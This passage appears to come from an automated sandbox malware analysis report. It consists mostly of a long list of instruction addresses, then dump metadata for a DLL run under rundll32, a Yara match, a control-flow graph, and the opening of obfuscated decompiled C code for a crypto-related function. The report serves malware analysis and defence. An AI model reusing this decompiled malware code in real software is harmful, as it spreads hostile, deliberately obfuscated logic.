                                                                        0x1000e0b9
                                                                        0x1000e0c1
                                                                        0x1000e0c6
                                                                        0x1000e0cb
                                                                        0x1000e0d3
                                                                        0x1000e0db
                                                                        0x1000e0e3
                                                                        0x1000e0f3
                                                                        0x1000e0fb
                                                                        0x1000e0fe
                                                                        0x1000e104
                                                                        0x1000e10c
                                                                        0x1000e117
                                                                        0x1000e11f
                                                                        0x1000e12a
                                                                        0x1000e135
                                                                        0x1000e13d
                                                                        0x1000e148
                                                                        0x1000e150
                                                                        0x1000e15e
                                                                        0x1000e163
                                                                        0x1000e16e
                                                                        0x1000e171
                                                                        0x1000e175
                                                                        0x1000e17d
                                                                        0x1000e188
                                                                        0x1000e193
                                                                        0x1000e19e
                                                                        0x1000e1a9
                                                                        0x1000e1b4
                                                                        0x1000e1bc
                                                                        0x1000e1c4
                                                                        0x1000e1cf
                                                                        0x1000e1da
                                                                        0x1000e1e5
                                                                        0x1000e1f0
                                                                        0x1000e1fb
                                                                        0x1000e211
                                                                        0x1000e218
                                                                        0x1000e223
                                                                        0x1000e22a
                                                                        0x1000e235
                                                                        0x1000e240
                                                                        0x1000e24b
                                                                        0x1000e256
                                                                        0x1000e261
                                                                        0x1000e274
                                                                        0x1000e275
                                                                        0x1000e27c
                                                                        0x1000e284
                                                                        0x1000e28f
                                                                        0x1000e29a
                                                                        0x1000e2ae
                                                                        0x1000e2bd
                                                                        0x1000e2c4
                                                                        0x1000e2cf
                                                                        0x1000e2da
                                                                        0x1000e2e2
                                                                        0x1000e2ed
                                                                        0x1000e2f8
                                                                        0x1000e303
                                                                        0x1000e30e
                                                                        0x1000e319
                                                                        0x1000e324
                                                                        0x1000e32f
                                                                        0x1000e337
                                                                        0x1000e33f
                                                                        0x1000e349
                                                                        0x1000e34d
                                                                        0x1000e355
                                                                        0x1000e35d
                                                                        0x1000e365
                                                                        0x1000e369
                                                                        0x1000e371
                                                                        0x1000e379
                                                                        0x1000e38f
                                                                        0x1000e394
                                                                        0x1000e39b
                                                                        0x1000e3a6
                                                                        0x1000e3b1
                                                                        0x1000e3c1
                                                                        0x1000e3c7
                                                                        0x1000e3cf
                                                                        0x1000e3d7
                                                                        0x1000e3df
                                                                        0x1000e3ea
                                                                        0x1000e3f5
                                                                        0x1000e400
                                                                        0x1000e412
                                                                        0x1000e417
                                                                        0x1000e420
                                                                        0x1000e42b
                                                                        0x1000e43e
                                                                        0x1000e441
                                                                        0x1000e442
                                                                        0x1000e449
                                                                        0x1000e454
                                                                        0x1000e45c
                                                                        0x1000e467
                                                                        0x1000e472
                                                                        0x1000e47d
                                                                        0x1000e488
                                                                        0x1000e493
                                                                        0x1000e49e
                                                                        0x1000e4a9
                                                                        0x1000e4b4
                                                                        0x1000e4bf
                                                                        0x1000e4c7
                                                                        0x1000e4d2
                                                                        0x1000e4dd
                                                                        0x1000e4e8
                                                                        0x1000e4f0
                                                                        0x1000e4fb
                                                                        0x1000e503
                                                                        0x1000e50b
                                                                        0x1000e510
                                                                        0x1000e518
                                                                        0x1000e520
                                                                        0x1000e52b
                                                                        0x1000e536
                                                                        0x1000e541
                                                                        0x1000e54c
                                                                        0x1000e557
                                                                        0x1000e562
                                                                        0x1000e56d
                                                                        0x1000e578
                                                                        0x1000e58b
                                                                        0x1000e592
                                                                        0x1000e59d
                                                                        0x1000e5b3
                                                                        0x1000e5c2
                                                                        0x1000e5c9
                                                                        0x1000e5d4
                                                                        0x1000e5e8
                                                                        0x1000e5f1
                                                                        0x1000e5fc
                                                                        0x1000e604
                                                                        0x1000e60f
                                                                        0x1000e617
                                                                        0x1000e61f
                                                                        0x1000e627
                                                                        0x1000e62f
                                                                        0x1000e637
                                                                        0x1000e64b
                                                                        0x1000e650
                                                                        0x1000e662
                                                                        0x1000e669
                                                                        0x1000e674
                                                                        0x1000e688
                                                                        0x1000e68d
                                                                        0x1000e694
                                                                        0x1000e69f
                                                                        0x1000e6b4
                                                                        0x1000e6b7
                                                                        0x1000e6b8
                                                                        0x1000e6bf
                                                                        0x1000e6ca
                                                                        0x1000e6d5
                                                                        0x1000e6e0
                                                                        0x1000e6eb
                                                                        0x1000e701
                                                                        0x1000e708
                                                                        0x1000e713
                                                                        0x1000e71b
                                                                        0x1000e723
                                                                        0x1000e730
                                                                        0x1000e734
                                                                        0x1000e73c
                                                                        0x1000e747
                                                                        0x1000e752
                                                                        0x1000e762
                                                                        0x1000e769
                                                                        0x1000e774
                                                                        0x1000e77f
                                                                        0x1000e787
                                                                        0x1000e792
                                                                        0x1000e79d
                                                                        0x1000e7a8
                                                                        0x1000e7b3
                                                                        0x1000e7be
                                                                        0x1000e7c9
                                                                        0x1000e7da
                                                                        0x1000e7e1
                                                                        0x1000e7ec
                                                                        0x1000e7ff
                                                                        0x1000e806
                                                                        0x1000e811
                                                                        0x1000e824
                                                                        0x1000e82b
                                                                        0x1000e838
                                                                        0x1000e84c
                                                                        0x1000e851
                                                                        0x1000e85a
                                                                        0x1000e861
                                                                        0x1000e869
                                                                        0x1000e874
                                                                        0x1000e886
                                                                        0x1000e88b
                                                                        0x1000e894
                                                                        0x1000e89f
                                                                        0x1000e8aa
                                                                        0x1000e8b5
                                                                        0x1000e8c0
                                                                        0x1000e8cb
                                                                        0x1000e8d6
                                                                        0x1000e8de
                                                                        0x1000e8e6
                                                                        0x1000e8f1
                                                                        0x1000e904
                                                                        0x1000e905
                                                                        0x1000e914
                                                                        0x1000e91b
                                                                        0x1000e926
                                                                        0x1000e931
                                                                        0x1000e939
                                                                        0x1000e941
                                                                        0x1000e94c
                                                                        0x1000e957
                                                                        0x1000e95f
                                                                        0x1000e96a
                                                                        0x1000e975
                                                                        0x1000e97d
                                                                        0x1000e985
                                                                        0x1000e98a
                                                                        0x1000e992
                                                                        0x1000e99a
                                                                        0x1000e9a5
                                                                        0x1000e9ad
                                                                        0x1000e9b8
                                                                        0x1000e9c0
                                                                        0x1000e9c8
                                                                        0x1000e9d2
                                                                        0x1000e9d6
                                                                        0x1000e9de
                                                                        0x1000e9e9
                                                                        0x1000e9f0
                                                                        0x1000e9fb
                                                                        0x1000ea06
                                                                        0x1000ea0e
                                                                        0x1000ea16
                                                                        0x1000ea24
                                                                        0x1000ea28
                                                                        0x1000ea30
                                                                        0x1000ea3b
                                                                        0x1000ea4e
                                                                        0x1000ea55
                                                                        0x1000ea5d
                                                                        0x1000ea68
                                                                        0x1000ea73
                                                                        0x1000ea7e
                                                                        0x1000ea89
                                                                        0x1000ea94
                                                                        0x1000ea9f
                                                                        0x1000eaaa
                                                                        0x1000eab7
                                                                        0x1000eabf
                                                                        0x1000eace
                                                                        0x1000ead1
                                                                        0x1000ead5
                                                                        0x1000eada
                                                                        0x1000eae2
                                                                        0x1000eaed
                                                                        0x1000eaf5
                                                                        0x1000eb07
                                                                        0x1000eb0e
                                                                        0x1000eb19
                                                                        0x1000eb24
                                                                        0x1000eb2f
                                                                        0x1000eb3a
                                                                        0x1000eb45
                                                                        0x1000eb4c
                                                                        0x1000eb57
                                                                        0x1000eb62
                                                                        0x1000eb6d
                                                                        0x1000eb78
                                                                        0x1000eb83
                                                                        0x1000eb8b
                                                                        0x1000eb90
                                                                        0x1000eb98
                                                                        0x1000eba0
                                                                        0x1000eba8
                                                                        0x1000ebb0
                                                                        0x1000ebbd
                                                                        0x1000ebbe
                                                                        0x1000ebc2
                                                                        0x1000ebca
                                                                        0x1000ebd2
                                                                        0x1000ebda
                                                                        0x1000ebe2
                                                                        0x1000ebea
                                                                        0x1000ebf2
                                                                        0x1000ebfa
                                                                        0x1000ec05
                                                                        0x1000ec10
                                                                        0x1000ec1b
                                                                        0x1000ec26
                                                                        0x1000ec2e
                                                                        0x1000ec33
                                                                        0x1000ec41
                                                                        0x1000ec45
                                                                        0x1000ec4d
                                                                        0x1000ec58
                                                                        0x1000ec60
                                                                        0x1000ec6b
                                                                        0x1000ec76
                                                                        0x1000ec7e
                                                                        0x1000ec89
                                                                        0x1000ec94
                                                                        0x1000ec9f
                                                                        0x1000ecaa
                                                                        0x1000ecb5
                                                                        0x1000ecc0
                                                                        0x1000ecc8
                                                                        0x1000ecd3
                                                                        0x1000ecde
                                                                        0x1000ece9
                                                                        0x1000ecf4
                                                                        0x1000ecff
                                                                        0x1000ed0a
                                                                        0x1000ed15
                                                                        0x1000ed1d
                                                                        0x1000ed28
                                                                        0x1000ed30
                                                                        0x1000ed3d
                                                                        0x1000ed43
                                                                        0x1000ed50
                                                                        0x1000ed58
                                                                        0x1000ed6c
                                                                        0x1000ed78
                                                                        0x1000ed7f
                                                                        0x1000ed8a
                                                                        0x1000ed95
                                                                        0x1000eda0
                                                                        0x1000eda8
                                                                        0x1000edbd
                                                                        0x1000edbe
                                                                        0x1000edc5
                                                                        0x1000edd0
                                                                        0x1000edd8
                                                                        0x1000ede0
                                                                        0x1000ede8
                                                                        0x1000edf0
                                                                        0x1000edf8
                                                                        0x1000ee15
                                                                        0x1000ee1c
                                                                        0x1000ee27
                                                                        0x1000ee3a
                                                                        0x1000ee41
                                                                        0x1000ee4c
                                                                        0x1000ee57
                                                                        0x1000ee5f
                                                                        0x1000ee6a
                                                                        0x1000ee72
                                                                        0x1000ee82
                                                                        0x1000ee86
                                                                        0x1000ee8e
                                                                        0x1000ee96
                                                                        0x1000eea1
                                                                        0x1000eeac
                                                                        0x1000eeb7
                                                                        0x1000eec2
                                                                        0x1000eecd
                                                                        0x1000eed8
                                                                        0x1000eee0
                                                                        0x1000eeeb
                                                                        0x1000eef3
                                                                        0x1000eefb
                                                                        0x1000ef00
                                                                        0x1000ef05
                                                                        0x1000ef0d
                                                                        0x1000ef18
                                                                        0x1000ef23
                                                                        0x1000ef2b
                                                                        0x1000ef36
                                                                        0x1000ef41
                                                                        0x1000ef49
                                                                        0x1000ef51
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef61
                                                                        0x1000ef61
                                                                        0x1000ef61
                                                                        0x1000ef61
                                                                        0x1000ef63
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ef69
                                                                        0x1000f34e
                                                                        0x1000f361
                                                                        0x1000f368
                                                                        0x1000f370
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef6f
                                                                        0x1000ef75
                                                                        0x1000f18e
                                                                        0x1000f190
                                                                        0x1000f27e
                                                                        0x1000f284
                                                                        0x1000f32c
                                                                        0x1000f331
                                                                        0x1000f333
                                                                        0x1000f80b
                                                                        0x1000f812
                                                                        0x1000f812
                                                                        0x1000f339
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f28a
                                                                        0x1000f290
                                                                        0x1000f30e
                                                                        0x1000f314
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f292
                                                                        0x1000f298
                                                                        0x1000f2ea
                                                                        0x1000f2ef
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f29a
                                                                        0x1000f2a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f2c3
                                                                        0x1000f2cb
                                                                        0x1000f2cc
                                                                        0x1000f2d4
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f196
                                                                        0x1000f7f1
                                                                        0x00000000
                                                                        0x1000f7f1
                                                                        0x1000f19c
                                                                        0x1000f1a2
                                                                        0x1000f26c
                                                                        0x1000f271
                                                                        0x1000f274
                                                                        0x1000f274
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f1a8
                                                                        0x1000f1ae
                                                                        0x1000f232
                                                                        0x1000f239
                                                                        0x1000f241
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f1b0
                                                                        0x1000f1b6
                                                                        0x1000f1fd
                                                                        0x1000f202
                                                                        0x1000f204
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f215
                                                                        0x1000f21a
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f1b8
                                                                        0x1000f1be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f1e4
                                                                        0x1000f1e9
                                                                        0x1000f1ec
                                                                        0x1000f1ec
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef7b
                                                                        0x1000f184
                                                                        0x00000000
                                                                        0x1000f184
                                                                        0x1000ef81
                                                                        0x1000ef87
                                                                        0x1000f0f6
                                                                        0x1000f0fc
                                                                        0x1000f173
                                                                        0x1000f17a
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f0fe
                                                                        0x1000f104
                                                                        0x1000f151
                                                                        0x1000f156
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f106
                                                                        0x1000f10c
                                                                        0x1000f13e
                                                                        0x1000f143
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f10e
                                                                        0x1000f114
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f126
                                                                        0x1000f12d
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef8d
                                                                        0x1000f0ae
                                                                        0x1000f0b3
                                                                        0x1000f0b6
                                                                        0x1000f0b8
                                                                        0x1000f677
                                                                        0x1000f677
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f0c9
                                                                        0x1000f0ce
                                                                        0x1000f0d6
                                                                        0x1000f0db
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f0e1
                                                                        0x1000f0e9
                                                                        0x1000f0ee
                                                                        0x00000000
                                                                        0x1000f0ee
                                                                        0x1000ef99
                                                                        0x1000f073
                                                                        0x1000f078
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000efa5
                                                                        0x1000f057
                                                                        0x1000f05e
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000efb1
                                                                        0x1000f7e3
                                                                        0x00000000
                                                                        0x1000f7e3
                                                                        0x1000efbd
                                                                        0x1000f03d
                                                                        0x1000f044
                                                                        0x1000f046
                                                                        0x1000efff
                                                                        0x1000efff
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000efc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000efe0
                                                                        0x1000f015
                                                                        0x1000f01c
                                                                        0x1000f024
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000eff0
                                                                        0x1000eff7
                                                                        0x1000eff9
                                                                        0x00000000
                                                                        0x1000eff9
                                                                        0x1000f37b
                                                                        0x1000f381
                                                                        0x1000f5e9
                                                                        0x1000f5ef
                                                                        0x1000f6ae
                                                                        0x1000f6b4
                                                                        0x1000f7b5
                                                                        0x1000f7ba
                                                                        0x1000f7bd
                                                                        0x1000f7c2
                                                                        0x1000f7c2
                                                                        0x00000000
                                                                        0x1000f7c2
                                                                        0x1000f6ba
                                                                        0x1000f6c0
                                                                        0x1000f72d
                                                                        0x1000f73b
                                                                        0x1000f758
                                                                        0x1000f780
                                                                        0x1000f785
                                                                        0x1000f788
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f6c2
                                                                        0x1000f6c4
                                                                        0x1000f70d
                                                                        0x1000f712
                                                                        0x1000f715
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f6c6
                                                                        0x1000f6cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f6da
                                                                        0x1000f6df
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f5f5
                                                                        0x1000f69d
                                                                        0x1000f6a2
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f5fb
                                                                        0x1000f601
                                                                        0x1000f688
                                                                        0x1000f68a
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f603
                                                                        0x1000f609
                                                                        0x1000f667
                                                                        0x1000f66d
                                                                        0x1000f66f
                                                                        0x1000f66f
                                                                        0x00000000
                                                                        0x1000f66f
                                                                        0x1000f60b
                                                                        0x1000f611
                                                                        0x1000f643
                                                                        0x1000f648
                                                                        0x1000f64b
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f613
                                                                        0x1000f619
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f61f
                                                                        0x00000000
                                                                        0x1000f61f
                                                                        0x1000f387
                                                                        0x1000f5df
                                                                        0x00000000
                                                                        0x1000f5df
                                                                        0x1000f38d
                                                                        0x1000f393
                                                                        0x1000f547
                                                                        0x1000f54d
                                                                        0x1000f806
                                                                        0x00000000
                                                                        0x1000f806
                                                                        0x1000f553
                                                                        0x1000f559
                                                                        0x1000f5d0
                                                                        0x1000f5d5
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f55b
                                                                        0x1000f561
                                                                        0x1000f5ac
                                                                        0x1000f5b9
                                                                        0x1000f5be
                                                                        0x00000000
                                                                        0x1000f5c1
                                                                        0x1000f563
                                                                        0x1000f569
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f57d
                                                                        0x1000f582
                                                                        0x1000f584
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f58a
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f399
                                                                        0x1000f538
                                                                        0x1000f53d
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f39f
                                                                        0x1000f3a5
                                                                        0x1000f51e
                                                                        0x1000f523
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f3ab
                                                                        0x1000f3b1
                                                                        0x1000f45a
                                                                        0x1000f465
                                                                        0x1000f473
                                                                        0x1000f47a
                                                                        0x1000f482
                                                                        0x1000f483
                                                                        0x1000f488
                                                                        0x1000f48b
                                                                        0x1000f48d
                                                                        0x1000f4d5
                                                                        0x1000f4e1
                                                                        0x1000f4f8
                                                                        0x1000f508
                                                                        0x1000f50d
                                                                        0x1000f510
                                                                        0x00000000
                                                                        0x1000f510
                                                                        0x1000f496
                                                                        0x1000f4ad
                                                                        0x1000f4ba
                                                                        0x1000f4bf
                                                                        0x1000f4c2
                                                                        0x1000f4c4
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f3b7
                                                                        0x1000f3bd
                                                                        0x1000f419
                                                                        0x1000f41e
                                                                        0x1000f421
                                                                        0x1000f423
                                                                        0x1000f3ec
                                                                        0x1000f3ec
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f43c
                                                                        0x1000f449
                                                                        0x1000f450
                                                                        0x00000000
                                                                        0x1000f450
                                                                        0x1000f3bf
                                                                        0x1000f3c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f3df
                                                                        0x1000f3e0
                                                                        0x1000f3e1
                                                                        0x1000f3e8
                                                                        0x1000f3ea
                                                                        0x1000f3f6
                                                                        0x00000000
                                                                        0x1000f3f6
                                                                        0x00000000
                                                                        0x1000f7c7
                                                                        0x1000f7c7
                                                                        0x1000f7c7
                                                                        0x00000000
                                                                        0x1000f7d3

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $#x$(1$0G$2N$5h$6N$;l$@P$B$EA$Lw$N$T5$Ue.$X$]1$b)$g@$j:$lK$ly$mU$o$q2$s4$v^$y?${$}L$}o$~|$4$_
                                                                        • API String ID: 0-2583851105
                                                                        • Opcode ID: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
                                                                        • Instruction ID: 09289fdc9c065f3b08f6dc9904ee957473f24b9c187b49a6f0bb080dac621220
                                                                        • Opcode Fuzzy Hash: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
                                                                        • Instruction Fuzzy Hash: DED202715093818BE3B8CF25C58ABDFBBE1FB84344F10891DE59A86260DBB59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000ADCE, Relevance: 31.9, Strings: 25, Instructions: 696COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 367 1000adce-1000ba31 call 100056b2 370 1000ba35 367->370 371 1000ba3a-1000ba3c 370->371 372 1000bcf2-1000bcf8 371->372 373 1000ba42 371->373 374 1000be2b-1000be43 call 1001676b 372->374 375 1000bcfe-1000bd04 372->375 376 1000bc87-1000bcea call 10009b08 373->376 377 1000ba48-1000ba4e 373->377 398 1000be46-1000be4a 374->398 379 1000bdba-1000be29 call 100089c3 call 100091cd 375->379 380 1000bd0a-1000bd10 375->380 376->372 381 1000ba54-1000ba5b 377->381 382 1000bc5a-1000bc7a call 10008df2 377->382 379->398 386 1000bdb0-1000bdb5 380->386 387 1000bd16-1000bd1c 380->387 388 1000ba61-1000ba67 381->388 389 1000bb4e-1000bb50 381->389 410 1000bc7d 382->410 386->371 393 1000bd54-1000bd56 387->393 394 1000bd1e-1000bd24 387->394 395 1000be60-1000be88 call 10008df2 388->395 396 1000ba6d-1000ba73 388->396 399 1000bb52-1000bb72 call 1001bf25 389->399 400 1000bb76-1000bc17 call 10003391 call 1001c5f7 389->400 408 1000bd58-1000bd5b 393->408 409 1000bd5d 393->409 404 1000bd2a-1000bd4f call 10008df2 394->404 405 1000be4f-1000be55 394->405 421 1000be8b-1000be97 395->421 406 1000ba79-1000ba7f 396->406 407 1000bb2e-1000bb4c call 10006ac1 396->407 398->405 399->400 400->410 433 1000bc19-1000bc50 call 100022e8 400->433 430 1000bb21-1000bb29 404->430 420 1000be57-1000be5b 405->420 405->421 406->405 418 1000ba85-1000baa7 call 100157e8 406->418 407->430 419 1000bd5f-1000bd61 408->419 409->419 410->376 434 1000baa9-1000bac6 call 10007b20 418->434 435 1000bb1c 418->435 426 1000bd63-1000bd65 419->426 427 1000bd67 419->427 420->371 428 1000bd69-1000bdab call 10007d55 426->428 427->428 428->430 430->370 433->382 441 1000bac8-1000baf3 call 1001cdcc 434->441 442 1000bafa-1000bb19 call 100091cd 434->442 435->430 441->442 442->435
                                                                        C-Code - Quality: 94%
                                                                        			E1000ADCE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr* _v340;
				intOrPtr* _v344;
				void* _t776;
				intOrPtr* _t779;
				intOrPtr* _t782;
				intOrPtr* _t794;
				intOrPtr _t799;
				intOrPtr _t800;
				void* _t806;
				void* _t808;
				intOrPtr _t810;
				intOrPtr* _t811;
				intOrPtr* _t815;
				signed int _t824;
				void* _t833;
				signed int _t834;
				void* _t876;
				intOrPtr _t879;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t911;
				intOrPtr* _t917;
				void* _t919;
				void* _t921;
				void* _t923;

				_t815 = _a24;
				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_a32);
				_push(_a28);
				_push(_t815);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_a36 & 0x0000ffff);
				_v16 = 0x698fe5;
				_v4 = 0;
				_t817 = 0;
				_v20 = 0;
				_t917 = 0;
				_v12 = 0x6421c2;
				_t919 =  &_v344 + 0x30;
				_v8 = 0x4b39f;
				_v116 = 0xe145;
				_t911 = 0x2a775466;
				_v32 = 0;
				_t892 = 0x2c;
				_v344 = 0;
				_v116 = _v116 * 0x68;
				_v116 = _v116 ^ 0x005b8408;
				_v252 = 0x1a30;
				_v252 = _v252 | 0xfbfb3abf;
				_v252 = _v252 ^ 0xfbfb3aac;
				_v308 = 0xd892;
				_v308 = _v308 | 0x24cee9b5;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x3a963db2;
				_v308 = _v308 ^ 0x84fbfd7a;
				_v144 = 0xe41e;
				_v144 = _v144 ^ 0xfb5a10bc;
				_v144 = _v144 >> 2;
				_v144 = _v144 ^ 0x3ed63d28;
				_v292 = 0xf2f6;
				_v292 = _v292 + 0xffff8fc8;
				_v292 = _v292 / _t892;
				_v292 = _v292 + 0x4f67;
